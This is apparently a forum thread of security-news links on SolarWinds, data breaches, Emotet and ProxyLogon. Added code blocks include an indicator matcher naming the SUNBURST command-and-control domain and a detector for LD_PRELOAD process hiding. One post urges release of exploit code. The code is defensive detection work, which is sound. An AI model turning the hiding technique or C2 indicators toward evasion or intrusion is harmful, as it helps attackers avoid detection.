SolarWinds hackers breach US nuclear weapons agency
https://www.bleepingcomputer.com/news/security/solarwinds-hackers-breach-us-nuclear-weapons-agency/
Microsoft confirms breach in SolarWinds hack, denies infecting others
https://www.bleepingcomputer.com/news/microsoft/microsoft-confirms-breach-in-solarwinds-hack-denies-infecting-others/
Alert (AA20-352A) - Advanced Persistent Threat Compromise of Government Agencies, Critical Infrastructure, and Private Sector Organizations
https://us-cert.cisa.gov/ncas/alerts/aa20-352a
https://us-cert.cisa.gov/sites/default/files/publications/AA20-352A-APT_Compromise_of_Government_Agencies%2C_Critical%20Infrastructure%2C_and_Private_Sector_Organizations.pdf
Quite possibly tip of the 'Iceberg'
Microsoft identifies 40+ victims of SolarWinds hack, 80% from US
https://www.bleepingcomputer.com/news/security/microsoft-identifies-40-plus-victims-of-solarwinds-hack-80-percent-from-us/
-
FBI, CISA officially confirm US govt hacks after SolarWinds breach
https://www.bleepingcomputer.com/news/security/fbi-cisa-officially-confirm-us-govt-hacks-after-solarwinds-breach/
SolarWinds hackers breach US nuclear weapons agency
https://www.bleepingcomputer.com/news/security/solarwinds-hackers-breach-us-nuclear-weapons-agency/
Microsoft confirms breach in SolarWinds hack, denies infecting others
https://www.bleepingcomputer.com/news/microsoft/microsoft-confirms-breach-in-solarwinds-hack-denies-infecting-others/
Alert (AA20-352A) - Advanced Persistent Threat Compromise of Government Agencies, Critical Infrastructure, and Private Sector Organizations
https://us-cert.cisa.gov/ncas/alerts/aa20-352a
https://us-cert.cisa.gov/sites/default/files/publications/AA20-352A-APT_Compromise_of_Government_Agencies%2C_Critical%20Infrastructure%2C_and_Private_Sector_Organizations.pdf
Quite possibly tip of the 'Iceberg'
Microsoft identifies 40+ victims of SolarWinds hack, 80% from US
https://www.bleepingcomputer.com/news/security/microsoft-identifies-40-plus-victims-of-solarwinds-hack-80-percent-from-us/
The SolarWinds cyberattack: The hack, the victims, and what we know
https://www.bleepingcomputer.com/news/security/the-solarwinds-cyberattack-the-hack-the-victims-and-what-we-know/
-
SolarWinds hack-related IP list: https://raw.githubusercontent.com/ExtraHop/code-examples/main/sunburst/threats.json
polonus
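A small matcher, added here as an example and not taken from the post or from the ExtraHop repository, for putting an indicator list like the one linked above to work against logs. The loader assumes a flat JSON array of indicator strings (the real file's schema is not reproduced here, so adapt `load_indicators` to it); the indicator values and log lines below are constructed, using RFC 5737 documentation ranges for the IP entries and the avsvmcloud.com domain named in the CISA alert quoted earlier in this thread.

```python
import ipaddress
import json
import re
from typing import Dict, Iterable, List, Set

_IPV4 = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
_HOST = re.compile(r"\b(?:[a-z0-9-]+\.)+[a-z]{2,}\b", re.IGNORECASE)

# Constructed indicator feed in the assumed flat-array shape.
SAMPLE_INDICATORS = '["avsvmcloud.com", "198.51.100.0/24", "203.0.113.7"]'

# Constructed DNS/proxy log lines (the DGA-style label is made up).
SAMPLE_LOG = [
    "2020-12-14T10:01:02Z dns host=ws01 qname=constructed7x.appsync-api.eu-west-1.avsvmcloud.com",
    "2020-12-14T10:01:05Z proxy src=10.0.0.5 dst=198.51.100.20:443 action=allow",
    "2020-12-14T10:02:00Z proxy src=10.0.0.6 dst=93.184.216.34:443 host=example.com action=allow",
]


def load_indicators(json_text: str) -> Dict[str, Set]:
    """Split a JSON array of indicator strings into IP networks and domains.

    Single addresses become /32 networks; anything that is not an address or
    CIDR is treated as a domain and matched together with its subdomains.
    """
    nets, domains = set(), set()
    for item in json.loads(json_text):
        item = item.strip().lower()
        try:
            nets.add(ipaddress.ip_network(item, strict=False))
        except ValueError:
            domains.add(item)
    return {"networks": nets, "domains": domains}


def _domain_matches(host: str, domains: Set[str]) -> bool:
    host = host.lower().rstrip(".")
    return any(host == d or host.endswith("." + d) for d in domains)


def scan_lines(lines: Iterable[str], indicators: Dict[str, Set]) -> List[Dict[str, object]]:
    """Return one hit per indicator occurrence: line number, matched value and kind."""
    hits: List[Dict[str, object]] = []
    for lineno, line in enumerate(lines, 1):
        for ip in _IPV4.findall(line):
            try:
                addr = ipaddress.ip_address(ip)
            except ValueError:          # e.g. 999.1.1.1 matched by the loose regex
                continue
            if any(addr in net for net in indicators["networks"]):
                hits.append({"line": lineno, "indicator": ip, "kind": "ip"})
        for host in _HOST.findall(line):
            if _domain_matches(host, indicators["domains"]):
                hits.append({"line": lineno, "indicator": host.lower(), "kind": "domain"})
    return hits


if __name__ == "__main__":
    for hit in scan_lines(SAMPLE_LOG, load_indicators(SAMPLE_INDICATORS)):
        print(hit)
```

Domain indicators are matched as suffixes on purpose: beaconing to a C2 domain usually shows up under a per-victim subdomain, so an exact-match lookup would miss it.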
-
FBI, CISA officially confirm US govt hacks after SolarWinds breach
https://www.bleepingcomputer.com/news/security/fbi-cisa-officially-confirm-us-govt-hacks-after-solarwinds-breach/
SolarWinds hackers breach US nuclear weapons agency
https://www.bleepingcomputer.com/news/security/solarwinds-hackers-breach-us-nuclear-weapons-agency/
Microsoft confirms breach in SolarWinds hack, denies infecting others
https://www.bleepingcomputer.com/news/microsoft/microsoft-confirms-breach-in-solarwinds-hack-denies-infecting-others/
Alert (AA20-352A) - Advanced Persistent Threat Compromise of Government Agencies, Critical Infrastructure, and Private Sector Organizations
https://us-cert.cisa.gov/ncas/alerts/aa20-352a
https://us-cert.cisa.gov/sites/default/files/publications/AA20-352A-APT_Compromise_of_Government_Agencies%2C_Critical%20Infrastructure%2C_and_Private_Sector_Organizations.pdf
Quite possibly tip of the 'Iceberg'
Microsoft identifies 40+ victims of SolarWinds hack, 80% from US
https://www.bleepingcomputer.com/news/security/microsoft-identifies-40-plus-victims-of-solarwinds-hack-80-percent-from-us/
The SolarWinds cyberattack: The hack, the victims, and what we know
https://www.bleepingcomputer.com/news/security/the-solarwinds-cyberattack-the-hack-the-victims-and-what-we-know/
SolarWinds victims revealed after cracking the Sunburst malware DGA
https://www.bleepingcomputer.com/news/security/solarwinds-victims-revealed-after-cracking-the-sunburst-malware-dga/
-
Glomar response from FBI on accusations of secretly breaking into encryption.
Re: https://www.aclu.org/news/privacy-technology/the-fbi-is-secretly-breaking-into-encrypted-devices-were-suing/
What is a "Glomar" response? Read: https://en.wikipedia.org/wiki/Glomar_response
In most cases a Glomar response could be taken as confirmative.
Others are also into this, like Europol with their decryption platform.
polonus
-
Weekly Security News Roundup w/e 12-25-2020
https://youtu.be/DjveRsce7uo
-
T-Mobile data breach exposed phone numbers, call records
https://www.bleepingcomputer.com/news/security/t-mobile-data-breach-exposed-phone-numbers-call-records/
https://www.t-mobile.com/responsibility/consumer-info/security-incident
-
Data breach broker selling user records stolen from 26 companies
https://www.bleepingcomputer.com/news/security/data-breach-broker-selling-user-records-stolen-from-26-companies/
-
Security News Roundup w/e 1-1-2021
https://youtu.be/_Q8a5DAFh34
-
Beware: PayPal phishing texts state your account is 'limited'
https://www.bleepingcomputer.com/news/security/beware-paypal-phishing-texts-state-your-account-is-limited/
-
Hacker posts data of 10,000 American Express accounts for free
https://www.bleepingcomputer.com/news/security/hacker-posts-data-of-10-000-american-express-accounts-for-free/
-
WhatsApp: Share your data with Facebook or delete your account
https://www.bleepingcomputer.com/news/security/whatsapp-share-your-data-with-facebook-or-delete-your-account/
-
Weekly Security News Roundup w/e 1/8/2021
https://youtu.be/obD-fx4uBs8
-
Analysis Report (AR21-013A) - Strengthening Security Configurations to Defend Against Attackers Targeting Cloud Services
https://us-cert.cisa.gov/ncas/analysis-reports/ar21-013a
-
Weekly Security News Roundup w/e 1-15-2021
https://youtu.be/lnYSNin0g1c
-
IObit forums hacked to spread ransomware to its members
https://www.bleepingcomputer.com/news/security/iobit-forums-hacked-to-spread-ransomware-to-its-members/
-
Investment fraud via dating apps
https://www.interpol.int/News-and-Events/News/2021/Investment-fraud-via-dating-apps
-
Hacker leaks full database of 77 million Nitro PDF user records
https://www.bleepingcomputer.com/news/security/hacker-leaks-full-database-of-77-million-nitro-pdf-user-records/
-
Avast Weekly Security News Roundup w/e 1-22-2021
https://youtu.be/fTDs4tP_cdY
-
Bonobos clothing store suffers a data breach, hacker leaks 70GB database
https://www.bleepingcomputer.com/news/security/bonobos-clothing-store-suffers-a-data-breach-hacker-leaks-70gb-database/
-
Hacker posts 1.9 million Pixlr user records for free on forum
https://www.bleepingcomputer.com/news/security/hacker-posts-19-million-pixlr-user-records-for-free-on-forum/
-
IObit forums hacked to spread ransomware to its members
https://www.bleepingcomputer.com/news/security/iobit-forums-hacked-to-spread-ransomware-to-its-members/
Ransomware gang taunts IObit with repeated forum hacks
https://www.bleepingcomputer.com/news/security/ransomware-gang-taunts-iobit-with-repeated-forum-hacks/
-
IObit forums hacked to spread ransomware to its members
https://www.bleepingcomputer.com/news/security/iobit-forums-hacked-to-spread-ransomware-to-its-members/
Ransomware gang taunts IObit with repeated forum hacks
https://www.bleepingcomputer.com/news/security/ransomware-gang-taunts-iobit-with-repeated-forum-hacks/
So which forum is next? If they succeed there, all forums will be up for grabs.
Although this forum hasn't been hacked recently, we are seeing more and more spammers daily
which are causing a disruption to this forum.
-
L.S.
https://www.nationalcrimeagency.gov.uk/news/nca-in-international-takedown-of-notorious-malware-emotet
Ukrainian police -> https://www.npu.gov.ua/news/kiberzlochini/kiberpolicziya-vikrila-transnaczionalne-ugrupovannya-xakeriv-u-rozpovsyudzhenni-najnebezpechnishogo-v-sviti-komp-yuternogo-virusu-EMOTET/
Good action; look at the URLhaus website for reports about EMOTET malware. Re: https://urlhaus.abuse.ch/browse.php?search=emotet
polonus (volunteer 3rd party cold recon website security analyst and website error-hunter)
-
L.S.
https://www.nationalcrimeagency.gov.uk/news/nca-in-international-takedown-of-notorious-malware-emotet
Ukrainian police -> https://www.npu.gov.ua/news/kiberzlochini/kiberpolicziya-vikrila-transnaczionalne-ugrupovannya-xakeriv-u-rozpovsyudzhenni-najnebezpechnishogo-v-sviti-komp-yuternogo-virusu-EMOTET/
Good action; look at the URLhaus website for reports about EMOTET malware. Re: https://urlhaus.abuse.ch/browse.php?search=emotet
-> https://forum.avast.com/index.php?topic=66267.msg1581877#msg1581877
-
Weekly Security News Roundup w/e 1-29-2021
https://youtu.be/dNBygnvqU2A
-
Perl.com domain stolen, now using IP address tied to malware
https://www.bleepingcomputer.com/news/security/perlcom-domain-stolen-now-using-ip-address-tied-to-malware/
-
See how bot malware (Emotet malcode too) uses open-source tools to evade detection.
Re: https://www.bleepingcomputer.com/news/security/linux-malware-uses-open-source-tool-to-evade-detection/
This tool is known as libprocesshider and is an open-source tool available on GitHub that can be used to hide any Linux process with the help of the ld preloader. Devious: http://web.archive.org/web/20201111214916/https://sysdig.com/blog/hiding-linux-processes-for-fun-and-profit/
Emotet-bot cleansing: 1. https://twitter.com/milkr3am/status/1354459859912192002
2. https://www.cplusplus.com/reference/ctime/tm/
Hard to imagine malware has better enterprise update schemes than common software often has. :o
polonus
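A detection counterpart to the hiding technique discussed above, added as an example and not taken from the post, from libprocesshider or from the Sysdig write-up. The preloaded library hooks the libc `readdir()` family, so `ls /proc` and tools built on it lose the hidden PID, but it does not intercept `stat()`: probing `/proc/<pid>` directly for every possible PID and comparing the two views exposes the gap. The check also reads `/etc/ld.so.preload`, where such libraries are typically installed. The PID sets in the self-test are constructed; the live run below only works on Linux and takes a few seconds when `pid_max` is large.

```python
import os
from typing import Callable, List, Set

PROC = "/proc"


def pids_via_readdir(proc: str = PROC) -> Set[int]:
    """PIDs as seen through the libc directory listing (readdir/readdir64), the path a preload hook filters."""
    return {int(name) for name in os.listdir(proc) if name.isdigit()}


def pid_exists(pid: int, proc: str = PROC) -> bool:
    """Probe /proc/<pid> with stat(); a readdir() hook does not change this answer."""
    try:
        os.stat(f"{proc}/{pid}")
        return True
    except FileNotFoundError:
        return False


def read_pid_max(proc: str = PROC, default: int = 32768) -> int:
    """Upper bound for the brute-force probe; falls back to the classic default."""
    try:
        with open(f"{proc}/sys/kernel/pid_max") as f:
            return int(f.read())
    except (OSError, ValueError):
        return default


def preload_libraries(path: str = "/etc/ld.so.preload") -> List[str]:
    """Libraries forced into every dynamically linked process; normally this file is absent."""
    try:
        with open(path) as f:
            return [line.strip() for line in f if line.strip() and not line.startswith("#")]
    except FileNotFoundError:
        return []


def find_hidden_pids(list_pids: Callable[[], Set[int]],
                     exists: Callable[[int], bool],
                     max_pid: int) -> Set[int]:
    """PIDs that answer a direct probe but never appear in the listing.

    A process that starts between the first listing and the probe would look
    hidden, so every candidate is checked against a second listing and probed
    again; only PIDs missing from both listings and still alive are reported.
    """
    first = list_pids()
    candidates = {pid for pid in range(1, max_pid + 1) if pid not in first and exists(pid)}
    if not candidates:
        return set()
    second = list_pids()
    return {pid for pid in candidates if pid not in second and exists(pid)}


if __name__ == "__main__":
    print("ld.so.preload entries:", preload_libraries() or "none")
    print("LD_PRELOAD in environment:", os.environ.get("LD_PRELOAD", "unset"))
    hidden = find_hidden_pids(pids_via_readdir, pid_exists, read_pid_max())
    print("PIDs hidden from readdir():", sorted(hidden) or "none")
```

An empty result only rules out readdir()-based hiding from this process; a hook that also wraps stat()/openat(), or a kernel-level rootkit, needs a different view (for example comparing against the scheduler's own accounting) rather than another libc call.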
-
Beware: Malicious Home Depot ad gets top spot in Google Search
https://www.bleepingcomputer.com/news/security/beware-malicious-home-depot-ad-gets-top-spot-in-google-search/
-
Beware: Malicious Home Depot ad gets top spot in Google Search
https://www.bleepingcomputer.com/news/security/beware-malicious-home-depot-ad-gets-top-spot-in-google-search/
Top spot on Google search is based primarily on the money spent by the advertiser, not on the best answer to your search.
One should never assume that the top answer is ever the best answer.
-
Top spot on Google search is based primarily on the money spent by the advertiser
Source? Evidence?
-
Top spot on Google search is based primarily on the money spent by the advertiser
Source? Evidence?
Ask yourself how Google makes its revenue? That should be a good indication.
Also, re-read my statement, it merely stated that you should not depend on the top spot being the best or most reliable answer.
-
See:
https://support.google.com/google-ads/answer/1722087?hl=en
-
Scammers posing as FBI agents threaten targets with jail time
https://www.bleepingcomputer.com/news/security/scammers-posing-as-fbi-agents-threaten-targets-with-jail-time/
https://www.fbi.gov/contact-us/field-offices/jacksonville/news/press-releases/government-impersonators-targeting-north-florida-residents-1
-
Perl.com domain stolen, now using IP address tied to malware
https://www.bleepingcomputer.com/news/security/perlcom-domain-stolen-now-using-ip-address-tied-to-malware/
Hey @Asyn,
Sorry for being a few days late, but thanks for sharing this info about Perl. I use it for custom scripts on both Win 10 and Linux. The scripts are stable as is, but I'm going to need to update my Linux installation soon, which would probably persuade me to update Perl "everywhere", so I will now proceed with extra caution. Thank you! :)
-
Perl.com domain stolen, now using IP address tied to malware
https://www.bleepingcomputer.com/news/security/perlcom-domain-stolen-now-using-ip-address-tied-to-malware/
Hey @Asyn,
Sorry for being a few days late, but thanks for sharing this info about Perl. I use it for custom scripts on both Win 10 and Linux. The scripts are stable as is, but I'm going to need to update my Linux installation soon, which would probably persuade me to update Perl "everywhere", so I will now proceed with extra caution. Thank you! :)
You're welcome. :)
Edit: https://log.perl.org/2021/01/perlcom-hijacked.html
-
Recent root-giving Sudo bug also impacts macOS
https://www.zdnet.com/article/recent-root-giving-sudo-bug-also-impacts-macos/
-
Google fixes Chrome zero-day actively exploited in the wild
https://www.bleepingcomputer.com/news/security/google-fixes-chrome-zero-day-actively-exploited-in-the-wild/
-
Weekly Security News Roundup w/e 2-5-2021
https://youtu.be/UrV3CIjcA6Q
-
The Great Suspender Chrome extension's fall from grace
https://www.bleepingcomputer.com/news/software/the-great-suspender-chrome-extensions-fall-from-grace/
-
Google looking into abandoning 3rd party cookies.
They think they've found a different way to keep track of your activities. :)
https://techxplore.com/news/2021-02-google-diet-cookies-track-users.html
-
Unpatched Vulnerability: 50,000 WP Sites Must Find Alternative for Contact Form 7 Style
https://www.wordfence.com/blog/2021/02/unpatched-vulnerability-50000-wp-sites-must-find-alternative-for-contact-form-7-style/
-
Another one -https://www.wordfence.com/blog/2021/02/severe-vulnerabilities-patched-in-nextgen-gallery-affect-over-800000-wordpress-sites/
Plug-in code for the PHP-based WordPress CMS is often found not fully updated or patched, and is also often abandoned by its developers.
The new versions here were installed by only 27% of affected websites.
polonus
-
Microsoft urges customers to patch critical Windows TCP/IP bugs
https://www.bleepingcomputer.com/news/security/microsoft-urges-customers-to-patch-critical-windows-tcp-ip-bugs/
https://msrc-blog.microsoft.com/2021/02/09/multiple-security-updates-affecting-tcp-ip/
-
Weekly Security News Roundup w/e 2-12-2021
This week's edition differs from Avast's version.
https://youtu.be/8Fe3wNbTWao
-
Yandex suffers data breach after sysadmin sold access to user emails
https://www.bleepingcomputer.com/news/security/yandex-suffers-data-breach-after-sysadmin-sold-access-to-user-emails/
https://yandex.com/company/press_center/press_releases/2021/2021-12-02
-
Yandex suffers data breach after sysadmin sold access to user emails
https://www.bleepingcomputer.com/news/security/yandex-suffers-data-breach-after-sysadmin-sold-access-to-user-emails/
https://yandex.com/company/press_center/press_releases/2021/2021-12-02
It amazes me that someone in that position would risk it all for some money, or stupid enough to think they could get away with it, potentially life ruined.
-
Yandex suffers data breach after sysadmin sold access to user emails
https://www.bleepingcomputer.com/news/security/yandex-suffers-data-breach-after-sysadmin-sold-access-to-user-emails/
https://yandex.com/company/press_center/press_releases/2021/2021-12-02
It amazes me that someone in that position would risk it all for some money, or stupid enough to think they could get away with it, potentially life ruined.
Yandex reminds me of Spandex, someone or something always seems to be pulling their strings and not in a good way.
Let's hope they bounce back.
-
Phishing scams - https://youtu.be/gD3o3RQHHBg
-
Phishing scams - https://youtu.be/gD3o3RQHHBg
;D 8)
-
Phishing scams - https://youtu.be/gD3o3RQHHBg
;D 8)
I hope that gets the message across. Delivering that same message as a human seemed to have no effect. :)
-
Watch out for sextortion email scams
https://blog.avast.com/sextortion-email-scams-avast
-
US cities disclose data breaches after vendor's ransomware attack
https://www.bleepingcomputer.com/news/security/us-cities-disclose-data-breaches-after-vendors-ransomware-attack/
-
Brave privacy bug exposes Tor onion URLs to your DNS provider
https://www.bleepingcomputer.com/news/security/brave-privacy-bug-exposes-tor-onion-urls-to-your-dns-provider/
-
Brave privacy bug exposes Tor onion URLs to your DNS provider
https://www.bleepingcomputer.com/news/security/brave-privacy-bug-exposes-tor-onion-urls-to-your-dns-provider/
Staying away from the Dark Web would also solve the problem. :)
-
Alert (AA21-055A) - Exploitation of Accellion File Transfer Appliance
https://us-cert.cisa.gov/ncas/alerts/aa21-055a
-
1Password has none, KeePass has none... So why are there seven embedded trackers in the LastPass Android app?
https://www.theregister.com/2021/02/25/lastpass_android_trackers_found/
-
Weekly Security News Roundup w/e 2-26-2021
https://youtu.be/J9VYa6e6dIo
-
T-Mobile discloses data breach after SIM swapping attacks
https://www.bleepingcomputer.com/news/security/t-mobile-discloses-data-breach-after-sim-swapping-attacks/
-
T-Mobile discloses data breach after SIM swapping attacks
https://www.bleepingcomputer.com/news/security/t-mobile-discloses-data-breach-after-sim-swapping-attacks/
Update February 27, 02:44 EST: The attackers used an internal T-Mobile application to target up to 400 customers in SIM swap attack attempts, BleepingComputer has learned. No T-Mobile for Business customers were impacted during this incident.
Headlines can and quite often can be very deceiving.
-
Beware: AOL phishing email states your account will be closed
https://www.bleepingcomputer.com/news/security/beware-aol-phishing-email-states-your-account-will-be-closed/
-
One of the biggest Android VPNs hacked? Data of 21 million users from 3 Android VPNs put for sale online
https://cybernews.com/security/one-of-the-biggest-android-vpns-hacked-data-of-21-million-users-from-3-android-vpns-put-for-sale-online/
-
Microsoft fixes actively exploited Exchange zero-day bugs, patch now
https://www.bleepingcomputer.com/news/security/microsoft-fixes-actively-exploited-exchange-zero-day-bugs-patch-now/
-
SITA data breach affects millions of travelers from major airlines
https://www.bleepingcomputer.com/news/security/sita-data-breach-affects-millions-of-travelers-from-major-airlines/
https://www.sita.aero/pressroom/news-releases/sita-statement-about-security-incident/
-
The latest WordPress plug-in zero-day was not detected by Wordfence,
but was found as a result of reporting by Submitter: Ville Korhonen (Seravo), Antony Booker (WP Charged).
Submitter website: https://seravo.com/
It has been patched with 4.1.7 of the mentioned Plus Addons for Elementor plug-in.
polonus
-
Security News Roundup for the Week ending 3/12/2021
https://youtu.be/Hw2um5Q3jbA
-
15-year-old Linux kernel bugs let attackers gain root privileges
https://www.bleepingcomputer.com/news/security/15-year-old-linux-kernel-bugs-let-attackers-gain-root-privileges/
-
More information on the Google fix for a second actively exploited Chrome browser zero-day was not given,
as it comes marked as "RESERVED": https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-21193
We somehow know it is in their browser WebKit engine, called Blink, specially positioned to harm Apple's WebKit version's opposition.
What we can at least say is that it falls in the realm of the following category of bugs, a so-called "Use after Free" bug: https://cwe.mitre.org/data/definitions/416.html
More information will be given once enough Google Chrome users have updated to the latest browser version
and have been patched against this zero-day memory bug.
polonus (volunteer 3rd party cold reconnaissance website security analyst and website error-hunter)
-
Lector saluti,
Microsoft how dare you do this to the security community?
It now becomes clear why Microsoft acquired Github.
Reason for the removal of exploit code: Working security through obscurity and defending their interests dictatorially,
by deleting all info that they do not like to be made public. In this case that particular POC info,
during times of their Exchange server security drama.
Sign of the times? Is this not against the rules for responsible disclosure to the security community and beyond?
Re: https://arstechnica.com/gadgets/2021/03/critics-fume-after-github-removes-exploit-code-for-exchange-vulnerabilities/
It might not even have been Microsoft that removed the ProxyLogon POC code, but Github itself.
The info is not gone (e.g. at praetorian dot com with a diff between the original and patched code),
and still available on archived repositories, only direct links have been removed.
Again the discussion.
Should we protect users too lazy and irresponsible to patch thousands and thousands of such Exchange servers soon?
Some would certainly speak out for that.
polonus (volunteer 3rd party cold reconnaissance website security analyst and website error-hunter)
-
Lector saluti,
Microsoft how dare you do this to the security community?
It now becomes clear why Microsoft acquired Github.
Reason for the removal of exploit code: Working security through obscurity and defending their interests dictatorially,
by deleting all info that they do not like to be made public. In this case that particular POC info,
during times of their Exchange server security drama.
Sign of the times? Is this not against the rules for responsible disclosure to the security community and beyond?
Re: https://arstechnica.com/gadgets/2021/03/critics-fume-after-github-removes-exploit-code-for-exchange-vulnerabilities/
It might not even have been Microsoft that removed the ProxyLogon POC code, but Github itself.
The info is not gone (e.g. at praetorian dot com with a diff between the original and patched code),
and still available on archived repositories, only direct links have been removed.
Again the discussion.
Should we protect users too lazy and irresponsible to patch thousands and thousands of such Exchange servers soon?
Some would certainly speak out for that.
polonus (volunteer 3rd party cold reconnaissance website security analyst and website error-hunter)
A dissenting view
Marcus Hutchins, a security researcher at Kryptos Logic, pushed back on those critics. He said Github has indeed removed PoCs for patched vulnerabilities affecting non-Microsoft software. He also made a case for Github removing the Exchange exploit.
“I’ve seen Github remove malicious code before, and not just code targeted at Microsoft products,” he told me in a direct message. “I highly doubt MS played any role in the removal and it just simply fell afoul of Github’s ‘Active malware or exploits’ policy in the [terms of service], due to the exploit being extremely recent and the large number of servers at imminent risk of ransomware.”
Responding to Kennedy on Twitter, Hutchins added (https://twitter.com/MalwareTechBlog/status/1370098050186706950), "'Has already been patched.' Dude, there’s more than 50,000 unpatched exchange servers out there. Releasing a full ready to go RCE chain is not security research, it’s recklessness and stupid.”
-
Hi bob3160,
We are doing this to ourselves, by making use of "closed proprietary source",
which cannot be gone over with scrutiny like open source code.
Security through obscurity is the name of the game.
Mind you, the Chinese now also sit on MAPP program exploits, and not only the services from the US of A.
Closed source, we have all confidence in it, and some prosper from it.
But alas, the POC info is already out on the Interwebz, and once there, it won't go away.
A pity for monopolists. Re: https://www.praetorian.com/blog/reproducing-proxylogon-exploit/
Hope the POC-code will return there after all Exchange servers have been fully patched.
Certainly there should be room for "responsible disclosure" to check on what MS is up to.
polonus
-
Microsoft fixes actively exploited Exchange zero-day bugs, patch now
https://www.bleepingcomputer.com/news/security/microsoft-fixes-actively-exploited-exchange-zero-day-bugs-patch-now/
One-Click Microsoft Exchange On-Premises Mitigation Tool – March 2021
https://msrc-blog.microsoft.com/2021/03/15/one-click-microsoft-exchange-on-premises-mitigation-tool-march-2021/
-
Security News Roundup w/e 3-19-2021
https://youtu.be/ypJWIzeKbfY
-
Microsoft releases printer fix for older Windows Versions
https://www.bleepingcomputer.com/news/microsoft/microsoft-releases-printer-fix-for-older-windows-versions/
-
Cybercrime complaints are up, according to the FBI's latest report
https://blog.avast.com/fbi-internet-crime-report-avast
https://www.ic3.gov/Media/PDF/AnnualReport/2020_IC3Report.pdf
-
Apple fixes a iOS zero-day vulnerability actively used in attacks
https://www.bleepingcomputer.com/news/security/apple-fixes-a-ios-zero-day-vulnerability-actively-used-in-attacks/
https://support.apple.com/en-us/HT212256
-
PHP's Git server hacked to add backdoors to PHP source code
https://www.bleepingcomputer.com/news/security/phps-git-server-hacked-to-add-backdoors-to-php-source-code/
https://news-web.php.net/php.internals/113838
-
PHP's Git server hacked to add backdoors to PHP source code
https://www.bleepingcomputer.com/news/security/phps-git-server-hacked-to-add-backdoors-to-php-source-code/
https://news-web.php.net/php.internals/113838
Is moving to GitHub really the answer since it's also been under attack?
A better question should be is anything safe anymore?
-
533 million Facebook users’ phone numbers leaked on hacker forum
https://www.bleepingcomputer.com/news/security/533-million-facebook-users-phone-numbers-leaked-on-hacker-forum/
-
533 million Facebook users’ phone numbers leaked on hacker forum
https://www.bleepingcomputer.com/news/security/533-million-facebook-users-phone-numbers-leaked-on-hacker-forum/
This isn't new, it's rehashing 2019 information.
-
533 million Facebook users’ phone numbers leaked on hacker forum
https://www.bleepingcomputer.com/news/security/533-million-facebook-users-phone-numbers-leaked-on-hacker-forum/
This isn't new, it's rehashing 2019 information.
How to check if your info was exposed in the Facebook data leak
https://www.bleepingcomputer.com/news/security/how-to-check-if-your-info-was-exposed-in-the-facebook-data-leak/
-
533 million Facebook users’ phone numbers leaked on hacker forum
https://www.bleepingcomputer.com/news/security/533-million-facebook-users-phone-numbers-leaked-on-hacker-forum/
This isn't new, it's rehashing 2019 information.
How to check if your info was exposed in the Facebook data leak
https://www.bleepingcomputer.com/news/security/how-to-check-if-your-info-was-exposed-in-the-facebook-data-leak/
Your link isn't working for the following reason.
(https://d1ka0itfguscri.cloudfront.net/Lh/2021/04/05/10/59/crfh6RVnchl/preview.jpg)
This is still 2019 news.
-
533 million Facebook users’ phone numbers leaked on hacker forum
https://www.bleepingcomputer.com/news/security/533-million-facebook-users-phone-numbers-leaked-on-hacker-forum/
This isn't new, it's rehashing 2019 information.
How to check if your info was exposed in the Facebook data leak
https://www.bleepingcomputer.com/news/security/how-to-check-if-your-info-was-exposed-in-the-facebook-data-leak/
Have I Been Pwned adds search for leaked Facebook phone numbers
https://www.bleepingcomputer.com/news/security/have-i-been-pwned-adds-search-for-leaked-facebook-phone-numbers/
-
533 million Facebook users’ phone numbers leaked on hacker forum
https://www.bleepingcomputer.com/news/security/533-million-facebook-users-phone-numbers-leaked-on-hacker-forum/
This isn't new, it's rehashing 2019 information.
How to check if your info was exposed in the Facebook data leak
https://www.bleepingcomputer.com/news/security/how-to-check-if-your-info-was-exposed-in-the-facebook-data-leak/
Have I Been Pwned adds search for leaked Facebook phone numbers
https://www.bleepingcomputer.com/news/security/have-i-been-pwned-adds-search-for-leaked-facebook-phone-numbers/
The Facebook data leak: What you should do today
https://blog.avast.com/what-to-do-about-facebook-leak-avast
-
Scraped data of 500 million LinkedIn users being sold online, 2 million records leaked as proof
https://cybernews.com/news/stolen-data-of-500-million-linkedin-users-being-sold-online-2-million-leaked-as-proof-2/
-
Tech support scammers lure victims with fake antivirus billing emails
https://www.bleepingcomputer.com/news/security/tech-support-scammers-lure-victims-with-fake-antivirus-billing-emails/
-
Weekly Security News Roundup w/e 4-9-2021
https://youtu.be/S7WAkFNC-tU
-
Clubhouse data leak: 1.3 million scraped user records leaked online for free
https://cybernews.com/security/clubhouse-data-leak-1-3-million-user-records-leaked-for-free-online/
-
Google Chrome, Microsoft Edge zero-day vulnerability shared on Twitter
https://www.bleepingcomputer.com/news/security/google-chrome-microsoft-edge-zero-day-vulnerability-shared-on-twitter/
-
If Privacy is important to you, this was an excellent episode.
https://blog.avast.com/avast-hacker-archives-episode-5-eva-galperin-avast
-
NSA discovers critical Exchange Server vulnerabilities, patch now
https://www.bleepingcomputer.com/news/security/nsa-discovers-critical-exchange-server-vulnerabilities-patch-now/
-
Passwordstate password manager hacked in supply chain attack
https://www.bleepingcomputer.com/news/security/passwordstate-password-manager-hacked-in-supply-chain-attack/
-
Fake Microsoft DirectX 12 site pushes crypto-stealing malware
https://www.bleepingcomputer.com/news/security/fake-microsoft-directx-12-site-pushes-crypto-stealing-malware/
-
10,000 WordPress sites are still vulnerable to an Elementor add-on hole.
Core software with WordPress is often well-maintained.
But it is configuration, settings & add-ons where it can go critically wrong.
Often this affects vulnerable plug-ins.
Re: https://www.shodan.io/search?query=Elementor
and there are even more explicit scan results available.
Alert: elementor 3.1.4 Warning latest release (3.2.1)
https://elementor.com/
What happens when a hacker can brute force through that particular plug-in path?
A whole lot of genuine cyber-misery.
polonus
-
Hacker leaks 20 million alleged BigBasket user records for free
https://www.bleepingcomputer.com/news/security/hacker-leaks-20-million-alleged-bigbasket-user-records-for-free/
-
https://www.acunetix.com/vulnerabilities/web/wordpress-plugin-store-locator-plus-for-wordpress-open-email-relay-4-2-25/
polonus
-
Your stolen ParkMobile data is now free for wannabe scammers
https://www.bleepingcomputer.com/news/security/your-stolen-parkmobile-data-is-now-free-for-wannabe-scammers/
-
Weekly Security News Roundup w/e 4-30-2021
https://youtu.be/RIGcJU0O0W8
-
CVE-2021-21551 - Hundreds Of Millions Of Dell Computers At Risk Due to Multiple BIOS Driver Privilege Escalation Flaws
https://labs.sentinelone.com/cve-2021-21551-hundreds-of-millions-of-dell-computers-at-risk-due-to-multiple-bios-driver-privilege-escalation-flaws/
